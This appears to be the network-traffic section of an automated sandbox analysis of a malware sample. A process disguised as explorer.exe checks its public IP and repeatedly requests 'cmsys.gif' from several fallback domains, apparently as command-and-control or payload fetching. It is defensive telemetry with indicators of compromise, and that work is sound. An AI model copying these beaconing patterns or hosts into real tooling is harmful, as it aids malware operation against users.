                                                                                  Aug 5, 2022 09:10:18.536696911 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.538984060 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.588044882 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.588093042 CEST4434978951.81.194.202192.168.2.4
                                                                                  Aug 5, 2022 09:10:18.588104963 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:18.588159084 CEST49789443192.168.2.451.81.194.202
                                                                                  Aug 5, 2022 09:10:23.950360060 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:23.977631092 CEST8049791142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:23.981015921 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:23.981744051 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:24.008891106 CEST8049791142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:24.008917093 CEST8049791142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:24.008934021 CEST8049791142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:24.010246992 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:24.020059109 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:24.020100117 CEST4979180192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.114212990 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.141583920 CEST8049793142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:26.143354893 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.143997908 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.171581030 CEST8049793142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:26.171617985 CEST8049793142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:26.171638012 CEST8049793142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:26.171770096 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.178148031 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.178174019 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:26.205140114 CEST8049793142.250.145.82192.168.2.4
                                                                                  Aug 5, 2022 09:10:26.205478907 CEST4979380192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:28.441689968 CEST4979480192.168.2.4142.250.145.82
                                                                                  Aug 5, 2022 09:10:28.471155882 CEST8049794142.250.145.82192.168.2.4
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Aug 5, 2022 09:09:14.589622021 CEST | 192.168.2.4 | 8.8.8.8 | 0xb175 | Standard query (0) | 64.89.4.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) |
| Aug 5, 2022 09:09:15.360501051 CEST | 192.168.2.4 | 8.8.8.8 | 0xe985 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:28.133136988 CEST | 192.168.2.4 | 8.8.8.8 | 0x3f9 | Standard query (0) | vccmd01.googlecode.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:30.719669104 CEST | 192.168.2.4 | 8.8.8.8 | 0x8086 | Standard query (0) | vccmd02.googlecode.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:32.984909058 CEST | 192.168.2.4 | 8.8.8.8 | 0xef1f | Standard query (0) | vccmd03.googlecode.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:35.856082916 CEST | 192.168.2.4 | 8.8.8.8 | 0x414a | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:38.419701099 CEST | 192.168.2.4 | 8.8.8.8 | 0x2b93 | Standard query (0) | vccmd01.zxq.net | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:39.055088997 CEST | 192.168.2.4 | 8.8.8.8 | 0x9b2a | Standard query (0) | zxq.net | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:09:56.408037901 CEST | 192.168.2.4 | 8.8.8.8 | 0xe6a2 | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:10:14.969732046 CEST | 192.168.2.4 | 8.8.8.8 | 0x8134 | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:10:30.820203066 CEST | 192.168.2.4 | 8.8.8.8 | 0x1b26 | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:10:46.631505966 CEST | 192.168.2.4 | 8.8.8.8 | 0xab51 | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
| Aug 5, 2022 09:11:02.050827026 CEST | 192.168.2.4 | 8.8.8.8 | 0xadc3 | Standard query (0) | vccmd01.t35.com | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 5, 2022 09:09:14.607461929 CEST | 8.8.8.8 | 192.168.2.4 | 0xb175 | Name error (3) | 64.89.4.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Aug 5, 2022 09:09:15.381139994 CEST | 8.8.8.8 | 192.168.2.4 | 0xe985 | No error (0) | icanhazip.com |  | 104.18.114.97 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:15.381139994 CEST | 8.8.8.8 | 192.168.2.4 | 0xe985 | No error (0) | icanhazip.com |  | 104.18.115.97 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:28.170955896 CEST | 8.8.8.8 | 192.168.2.4 | 0x3f9 | No error (0) | vccmd01.googlecode.com | googlecode.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 5, 2022 09:09:28.170955896 CEST | 8.8.8.8 | 192.168.2.4 | 0x3f9 | No error (0) | googlecode.l.googleusercontent.com |  | 142.250.145.82 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:30.757955074 CEST | 8.8.8.8 | 192.168.2.4 | 0x8086 | No error (0) | vccmd02.googlecode.com | googlecode.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 5, 2022 09:09:30.757955074 CEST | 8.8.8.8 | 192.168.2.4 | 0x8086 | No error (0) | googlecode.l.googleusercontent.com |  | 142.250.145.82 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:33.012772083 CEST | 8.8.8.8 | 192.168.2.4 | 0xef1f | No error (0) | vccmd03.googlecode.com | googlecode.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 5, 2022 09:09:33.012772083 CEST | 8.8.8.8 | 192.168.2.4 | 0xef1f | No error (0) | googlecode.l.googleusercontent.com |  | 142.250.145.82 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:35.957488060 CEST | 8.8.8.8 | 192.168.2.4 | 0x414a | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:38.437709093 CEST | 8.8.8.8 | 192.168.2.4 | 0x2b93 | No error (0) | vccmd01.zxq.net |  | 51.81.194.202 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:39.230453014 CEST | 8.8.8.8 | 192.168.2.4 | 0x9b2a | No error (0) | zxq.net |  | 51.81.194.202 | A (IP address) | IN (0x0001)
Aug 5, 2022 09:09:56.509676933 CEST | 8.8.8.8 | 192.168.2.4 | 0xe6a2 | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
Aug 5, 2022 09:10:15.073512077 CEST | 8.8.8.8 | 192.168.2.4 | 0x8134 | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
Aug 5, 2022 09:10:30.921627998 CEST | 8.8.8.8 | 192.168.2.4 | 0x1b26 | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
Aug 5, 2022 09:10:46.733151913 CEST | 8.8.8.8 | 192.168.2.4 | 0xab51 | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
Aug 5, 2022 09:11:02.068605900 CEST | 8.8.8.8 | 192.168.2.4 | 0xadc3 | Name error (3) | vccmd01.t35.com | none | none | A (IP address) | IN (0x0001)
                                                                                  • zxq.net
                                                                                  • icanhazip.com
                                                                                  • vccmd01.googlecode.com
                                                                                  • vccmd02.googlecode.com
                                                                                  • vccmd03.googlecode.com
                                                                                  • vccmd01.zxq.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49766 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49769 | 51.81.194.202 | 443 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49762 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:09:33.049024105 CEST | 1152 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:09:33.076080084 CEST | 1153 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:33 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Aug 5, 2022 09:09:33.076112986 CEST | 1154 | IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.4 | 49764 | 51.81.194.202 | 80 | C:\Windows\System\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Aug 5, 2022 09:09:38.610742092 CEST | 1155 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:09:38.777231932 CEST | 1156 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:09:38 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Aug 5, 2022 09:09:58.454772949 CEST | 1383 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:09:58.622678995 CEST | 1383 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:09:58 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Aug 5, 2022 09:10:17.062716007 CEST | 1441 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:10:17.228876114 CEST | 1442 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:17 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Aug 5, 2022 09:10:33.513569117 CEST | 1471 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:10:33.679996967 CEST | 1472 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:33 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
Aug 5, 2022 09:10:49.037395000 CEST | 9200 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
Aug 5, 2022 09:10:49.204044104 CEST | 9201 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:10:49 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                                                                  Aug 5, 2022 09:11:04.308193922 CEST | 9221 | OUT | GET /cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.zxq.net
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:11:04.474598885 CEST | 9222 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: Keep-Alive
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  content-length: 707
                                                                                  date: Fri, 05 Aug 2022 07:11:04 GMT
                                                                                  location: https://zxq.net/cmsys.gif
                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  12 | 192.168.2.4 | 49775 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:49.868995905 CEST | 1305 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:49.895886898 CEST | 1313 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:49 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:49.895904064 CEST | 1314 | IN | Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  13 | 192.168.2.4 | 49780 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:51.685256004 CEST | 1368 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:51.712455034 CEST | 1369 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:51 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:51.712469101 CEST | 1370 | IN | Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  14 | 192.168.2.4 | 49781 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:09:54.072979927 CEST | 1379 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:09:54.100311995 CEST | 1381 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:09:54 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:09:54.100342035 CEST | 1381 | IN | Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  15 | 192.168.2.4 | 49783 | 142.250.145.82 | 80 | C:\Windows\System\explorer.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 09:10:06.900579929 CEST | 1386 | OUT | GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:06.928702116 CEST | 1388 | IN | HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:06 GMT
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:06.928729057 CEST  1388  IN
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                                                                                  16  192.168.2.4  49784  142.250.145.82  80  C:\Windows\System\explorer.exe
                                                                                  Timestamp  kBytes transferred  Direction  Data
                                                                                  Aug 5, 2022 09:10:10.252279043 CEST  1389  OUT  GET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:10.279514074 CEST  1390  IN  HTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:10 GMT
